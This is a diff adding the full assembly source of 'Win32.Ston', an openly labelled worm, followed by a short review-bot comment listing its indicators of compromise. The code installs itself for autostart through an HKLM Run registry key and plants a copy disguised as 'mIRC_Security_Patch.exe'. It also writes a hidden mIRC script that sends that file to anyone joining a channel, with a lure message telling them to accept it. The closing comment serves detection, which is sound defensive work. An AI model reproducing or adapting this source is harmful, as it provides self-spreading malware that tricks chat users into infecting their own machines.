Updated dir structure in Win32
@@ -0,0 +1,246 @@
|
||||
;--------------------------------------------------------------------+
|
||||
;name: Win32.Ston |
|
||||
;author: Hutley / RRLF |
|
||||
;date 30.Jun.2006 |
|
||||
;webpage: www.Hutley.de.vu |
|
||||
;--------------------------------------------------------------------+
|
||||
; *** FEATURES |
|
||||
; - Start with Windows by Registry |
|
||||
; - Spread by mIRC using a script file |
|
||||
; |
|
||||
; *** THANX |
|
||||
; - DiA, SPTH, blueowl, dr3f |
|
||||
; |
|
||||
; *** COMMENT! |
|
||||
; My first that spread by mIRC! |
|
||||
;--------------------------------------------------------------------+
|
||||
|
||||
include '%fasminc%\win32ax.inc'
|
||||
|
||||
.data
|
||||
about db "Win32.Ston by Hutley / RRLF", 0
|
||||
_windir rb 255d
|
||||
ston_file rb 255d
|
||||
ston_new rb 255d
|
||||
; registry variables
|
||||
reg_subkey equ "Software\Microsoft\Windows\CurrentVersion\Run", 0
|
||||
reg_result db ?
|
||||
reg_value equ "Ston", 0
|
||||
; infect mIRC
|
||||
mirc_reg equ "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC", 0
|
||||
mirc_reg_rst db ?
|
||||
mirc_path rb 255d
|
||||
mirc_size db 255d
|
||||
mirc_file equ "\mIRC_Security_Patch.exe", 0
|
||||
mirc_ston equ "ston.mrc", 0
|
||||
mirc_ston_hdl dd ?
|
||||
mirc_dccsend db ".dcc send -clm $nick ",0
|
||||
mirc_content db "; Win32.Ston.Script by Hutley/RRLF",13,10,\
|
||||
"",13,10,\
|
||||
"on 1:JOIN:#:if ($nick != $me) }",13,10
|
||||
mirc_ctnt_size = $ - mirc_content
|
||||
mirc_other db 256 dup(?)
|
||||
mirc_rest db 13,10,".privmsg $nick Accept, its a very nice one!",13,10,"}"
|
||||
mirc_writen dd 0
|
||||
;mirc.ini
|
||||
ini_file db 0
|
||||
|
||||
.code
|
||||
|
||||
start:
|
||||
call autostart ; ok! auto start with windows
|
||||
call infect_mirc ; ok! copy in mirc folder
|
||||
call write_mirc.ini ; write in mirc.ini
|
||||
|
||||
invoke ExitProcess,\ ; that's all folks!
|
||||
0
|
||||
.end start
|
||||
|
||||
proc write_mirc.ini
|
||||
invoke lstrcat,\
|
||||
ini_file,\
|
||||
"\mirc.ini"
|
||||
|
||||
invoke WritePrivateProfileString,\
|
||||
"rfiles",\
|
||||
"n2",\
|
||||
"ston.mrc",\
|
||||
ini_file
|
||||
ret
|
||||
endp
|
||||
|
||||
proc infect_mirc
|
||||
invoke RegOpenKeyEx,\
|
||||
HKEY_LOCAL_MACHINE,\
|
||||
mirc_reg,\
|
||||
0,\
|
||||
KEY_READ,\
|
||||
mirc_reg_rst
|
||||
|
||||
cmp eax, 0 ; any error?
|
||||
jne error ; then exit
|
||||
; whithout error, then continue
|
||||
invoke RegQueryValueEx,\
|
||||
dword[mirc_reg_rst],\
|
||||
"UninstallString",\
|
||||
0,\
|
||||
0,\
|
||||
mirc_path,\
|
||||
mirc_size
|
||||
|
||||
invoke lstrlen,\
|
||||
mirc_path
|
||||
|
||||
mov esi, mirc_path
|
||||
sub eax, 21 ; 12 to mirc.exe | 21 to C:\mirc\
|
||||
mov byte [esi + eax], 0
|
||||
inc esi
|
||||
|
||||
invoke RegCloseKey,\
|
||||
mirc_reg_rst
|
||||
|
||||
invoke GetModuleFileName,\
|
||||
0,\
|
||||
ston_file,\
|
||||
255d
|
||||
|
||||
invoke lstrcpy,\
|
||||
ston_new,\
|
||||
esi
|
||||
|
||||
invoke lstrcpy,\
|
||||
ini_file,\
|
||||
esi
|
||||
|
||||
invoke lstrcat,\
|
||||
ston_new,\
|
||||
mirc_file
|
||||
|
||||
invoke lstrcpy,\
|
||||
mirc_other,\
|
||||
".dcc send -clm $nick "
|
||||
|
||||
invoke lstrcat,\
|
||||
mirc_other,\
|
||||
esi
|
||||
|
||||
invoke lstrcat,\
|
||||
mirc_other,\
|
||||
mirc_file
|
||||
|
||||
invoke CopyFile,\ ; let´s copy in mIRC folder
|
||||
ston_file,\
|
||||
ston_new,\
|
||||
FALSE
|
||||
|
||||
invoke lstrlen,\
|
||||
ston_new
|
||||
|
||||
mov esi, ston_new
|
||||
sub eax, 23
|
||||
mov byte[esi + eax], 0
|
||||
|
||||
invoke lstrcat,\
|
||||
esi,\
|
||||
mirc_ston
|
||||
|
||||
invoke CreateFile,\ ; create the script file (ston.mrc)
|
||||
esi,\
|
||||
GENERIC_WRITE,\
|
||||
0,\
|
||||
0,\
|
||||
CREATE_ALWAYS,\
|
||||
FILE_ATTRIBUTE_HIDDEN,\
|
||||
0
|
||||
|
||||
cmp eax, INVALID_HANDLE_VALUE ; protection of erros
|
||||
je error ; error? get out!
|
||||
mov dword[mirc_ston_hdl], eax ; handle of file creation in variable
|
||||
|
||||
invoke WriteFile,\
|
||||
dword[mirc_ston_hdl],\
|
||||
mirc_content,\
|
||||
mirc_ctnt_size,\
|
||||
mirc_writen,\
|
||||
0
|
||||
|
||||
invoke lstrlen,\
|
||||
mirc_other
|
||||
|
||||
invoke WriteFile,\
|
||||
dword[mirc_ston_hdl],\
|
||||
mirc_other,\
|
||||
eax,\
|
||||
mirc_writen,\
|
||||
0
|
||||
|
||||
invoke lstrlen,\
|
||||
mirc_rest
|
||||
|
||||
invoke WriteFile,\
|
||||
dword[mirc_ston_hdl],\
|
||||
mirc_rest,\
|
||||
eax,\
|
||||
mirc_writen,\
|
||||
0
|
||||
|
||||
invoke CloseHandle,\
|
||||
dword[mirc_ston_hdl]
|
||||
|
||||
error: ; if exist error i go to here
|
||||
invoke RegCloseKey,\ ; close the opened key
|
||||
mirc_reg_rst
|
||||
ret
|
||||
endp
|
||||
|
||||
|
||||
proc autostart ; auto start the virus by win registry
|
||||
invoke GetWindowsDirectory,\ ; let's copy to windows dir
|
||||
_windir,\
|
||||
255d
|
||||
|
||||
invoke GetModuleFileName,\
|
||||
0,\
|
||||
ston_file,\
|
||||
255d
|
||||
|
||||
invoke lstrcpy,\
|
||||
ston_new,\
|
||||
_windir
|
||||
|
||||
invoke lstrcat,\
|
||||
ston_new,\
|
||||
"\WinStone.exe"
|
||||
|
||||
invoke CopyFile,\
|
||||
ston_file,\
|
||||
ston_new,\
|
||||
FALSE
|
||||
|
||||
invoke lstrcpy,\
|
||||
ston_file,\
|
||||
ston_new
|
||||
|
||||
invoke RegOpenKeyEx,\ ; add to registry
|
||||
HKEY_LOCAL_MACHINE,\
|
||||
reg_subkey,\
|
||||
0,\
|
||||
KEY_SET_VALUE,\
|
||||
reg_result
|
||||
|
||||
invoke lstrlen,\
|
||||
ston_file
|
||||
|
||||
invoke RegSetValueEx,\
|
||||
dword[reg_result],\
|
||||
reg_value,\
|
||||
0,\
|
||||
REG_SZ,\
|
||||
ston_file,\
|
||||
eax
|
||||
|
||||
invoke RegCloseKey,\
|
||||
dword[reg_result]
|
||||
ret
|
||||
endp
|
||||
|
||||
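Review bot: The header comment at the top of the added file names two features (registry autostart, mIRC spreading) but never lists the registry and on-disk artifacts the code creates, which is what a responder triaging a host needs first. I would add an analyst-facing comment block under the FEATURES section enumerating, from the strings in this file: the value `Ston` under `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`, the copy `\WinStone.exe` in the Windows directory, `\mIRC_Security_Patch.exe` and `ston.mrc` in the mIRC folder, and the `rfiles` / `n2` = `ston.mrc` entry written to `mirc.ini`. The script file is created with `FILE_ATTRIBUTE_HIDDEN`, so the block should say that a default directory listing will not show it. For detection, the same block can note that the Run-key write and a change to the `rfiles` section of `mirc.ini` by a process other than mIRC are the two events worth alerting on.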